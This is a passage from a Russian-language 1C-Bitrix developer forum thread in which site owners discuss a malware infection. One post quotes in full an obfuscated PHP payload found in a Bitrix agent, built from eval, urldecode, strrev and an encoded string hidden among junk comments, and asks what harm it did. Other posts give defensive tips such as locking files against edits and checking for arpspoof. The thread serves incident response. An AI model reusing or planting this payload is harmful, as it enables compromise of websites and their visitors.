1С-Битрикс Разработчикам

Пользователь 181407 Постоянный посетитель Сообщений: 68 Баллов: 10 Регистрация: 09.08.2015	#301 0 08.11.2022 13:18:16 Я запретил папке prolog и файлу core.js редактирование, пока вирус не появлялся после этого. Следим за развитием ситуации...

Пользователь 462185

Заглянувший

Сообщений: 3 Регистрация: 14.01.2016

#302

09.11.2022 16:49:29

Здравствуйте, подскажите пожалуйста, обнаружили неизвестный нам агент на сайте, с таким содержимым:

Код

$arAgent["NAME"];//b3)!UCls}iWP:za #<n8HCZak~chvX[%g@[HF1LrCeval   //%L'6v[ ^P/):8#Mu^n4o.wMCYt<^}vUkn(8-,*.>Ed"(    //y0qoOW 2Rdq Re`X[%|bAWqRO4~rOSxwNz;\1kSjurldecode#@t3N(Zno!4p;m(//}v2Cf|SU5l.EGJ[ <]wfAL)RUstrrev//Oj]iSN}~!&{rC^a^b$ARzI@?NB(#HB9QbQPM}hFU,4?c-[$Iy@'b3%56%57%27%47%02%e6%27%57%47%56%27%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%d7%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b3%92%27%42%82%c6%16%67%56%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%56%37%c6%56%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%d7%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b3%27%42%02%d3%02%47%c6%57%37%56%27%f5%c6%16%67%56%42%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%44%f4%94%25%54%05%f5%35%94%02%c2%03%63%02%d3%02%c4%14%65%25%54%45%e4%94%f5%45%e4%54%74%14%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b7%92%92%d5%22%87%87%87%56%27%f6%47%37%56%27%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b3%72%b3%92%82%16%47%16%44%47%96%d6%26%57%37%a3%a3%56%c6%26%16%45%16%47%16%44%27%56%47%e6%57%f6%34%c5%c5%37%36%96%47%97%c6%16%e6%14%c5%c5%e6%96%16%d4%c5%c5%87%96%27%47%96%24%c5%c5%72%02%d3%02%27%42%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b7%56%37%c6%56%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%d7%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%d7%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b3%47%96%87%56%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b7%92%56%42%02%e6%f6%96%47%07%56%36%87%54%82%02%86%36%47%16%36%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%d7%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b3%92%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%56%46%f6%36%56%46%c6%27%57%82%56%46%f6%36%56%46%c6%27%57%82%c6%16%67%56%02%d3%02%56%42%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b7%97%27%47%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%a0%d0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%74%e4%94%e4%e4%55%25%02%c2%03%02%d3%02%45%e4%55%f4%34%f5%95%25%45%54%25%02%c2%c4%c4%55%e4%02%d3%02%b4%34%54%84%34%f5%54%45%14%44%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%b7%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%02%a0%d0%' /*7s%]YC79!(Iy!PH8p|^qS(PL`N|AtTXpgR]v/9Oya*/)#BrDTVN{4;~2]^<?C6UrR!Dfo_}E2)/*|q:uZO]rm%VOw=\p@cg+C|>f*/)      //xTiGO#1\ITXAI&--/VB8E>z9[rS|gE\$Ao%;#S+i?m<*K;QF,mT&g7L%Ho"o5%@n\}!^

Видно что агент выполнялся, но каких то модифицированных файлов в каталогах сайтах мы не обнаружили.
Нельзя ли определить, какой вред мог нанести данный код?

Пользователь 91502

Посетитель

Сообщений: 42 Баллов: 6 Регистрация: 17.05.2011

#303

10.11.2022 00:31:38

Я если честно пока ветку дочитал просто чуть со смеху не помер, есть хоть кто то кто осознал проблему BITRIX , хоть кто-то кто понимает что вся линейка BITRIX просто дыра возможно не умышленно сделали лазейки для себя а возможно по тупости и некомпетентности. Скачал свежую сборочку и проверил на несколько видов атак.. был удивлен и разочарован, дыры пришлось устранять самостоятельно, разочарую всех у кого не VPS ... ГОТОВЬТЕСЬ К ВЗЛОМУ ИЛИ ПРОСТО ИЩИТЕ НОВЫЙ ДВИЖОК...

Пользователь 47756

Заглянувший

Сообщений: 5 Регистрация: 26.08.2009

#304

10.11.2022 00:53:14

Цитата

написал:
Я если честно пока ветку дочитал просто чуть со смеху не помер, есть хоть кто то кто осознал проблему BITRIX , хоть кто-то кто понимает что вся линейка BITRIX просто дыра возможно не умышленно сделали лазейки для себя а возможно по тупости и некомпетентности. Скачал свежую сборочку и проверил на несколько видов атак.. был удивлен и разочарован, дыры пришлось устранять самостоятельно, разочарую всех у кого не VPS ... ГОТОВЬТЕСЬ К ВЗЛОМУ ИЛИ ПРОСТО ИЩИТЕ НОВЫЙ ДВИЖОК...

Сборочкой не поделитесь ?

Пользователь 13618

Эксперт

Сообщений: 1363 Баллов: 231 Регистрация: 05.04.2011

Сертифицированный партнер

#305

10.11.2022 03:54:35

Алексей Чебанов, поясните этот момент

Цитата
разочарую всех у кого не VPS ...

. В чем разница?

Какие именно виды атак на свежей сборки прошли?
Какие дыры Вы залатали?

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 91502

Посетитель

Сообщений: 42 Баллов: 6 Регистрация: 17.05.2011

#306

10.11.2022 21:24:33

Еще раз отвечу и думаю поставлю точку. Я не могу Вам тут описать метод взлома и уязвимости БИТРИКС это не законно, кому нужна свежая сборка скачивайте виртуальную машину и далее делайте стандартную установку предложенными в упаковке скриптами. Чтоб как то себя обезопасить делайте копию рабочего сайта каждые 12 часов. Я готов выложить компании Битрикс решения для ВПС серверов sab-ip@mail.ru . А ведь помница мне как я ругался с поддержкой и ранее описывал им их ошибки и халатность, допрыгались , слушать надо когда Вам что то говорят , а не оскорблять. Пожинаем плоды дебилокодеров

Пользователь 13618 Эксперт Сообщений: 1363 Баллов: 231 Регистрация: 05.04.2011 Сертифицированный партнер	#307 0 11.11.2022 03:38:42 Алексей Чебанов, Вас оскорбляли? Так и не понял, чем решение для vps будет отличаться от решения для шаред хостинга Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 6748714

Заглянувший

Сообщений: 1 Регистрация: 11.11.2022

#308

11.11.2022 20:27:50

Цитата

написал:
Еще раз отвечу и думаю поставлю точку. Я не могу Вам тут описать метод взлома и уязвимости БИТРИКС это не законно, кому нужна свежая сборка скачивайте виртуальную машину и далее делайте стандартную установку предложенными в упаковке скриптами. Чтоб как то себя обезопасить делайте копию рабочего сайта каждые 12 часов. Я готов выложить компании Битрикс решения для ВПС серверов sab-ip@mail.ru . А ведь помница мне как я ругался с поддержкой и ранее описывал им их ошибки и халатность, допрыгались , слушать надо когда Вам что то говорят , а не оскорблять. Пожинаем плоды дебилокодеров

Что в описании уязвимостей незаконного? Но раз уж так считаешь, поделись хотя бы одной уже закрытой и неизвестной уязвимостью, типа инъекции или подобного. Воздух сотрясаешь просто и людей оскорбляешь почём зря.
Решениями он поделится, без тебя эксперта разберутся. Делать копию каждые 12 часов... а почему не 6? Вовремя обновляться надо и следовать лучшим практикам безопасности, вот и все.

Пользователь 6403492 Заглянувший Сообщений: 16 Баллов: 1 Регистрация: 02.07.2022	#309 0 14.11.2022 22:51:27 История получила продолжение Проверяйте у себя /usr/sbin/arpspoof И если он есть, то вероятно ваша сеть (ессно помимо сервера) скомпроментированы

Пользователь 6403492 Заглянувший Сообщений: 16 Баллов: 1 Регистрация: 02.07.2022	#310 0 14.11.2022 22:55:39 Это если кроны битры выполнялись от рута вероятно Многие не учитывают почему-то этот момент

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером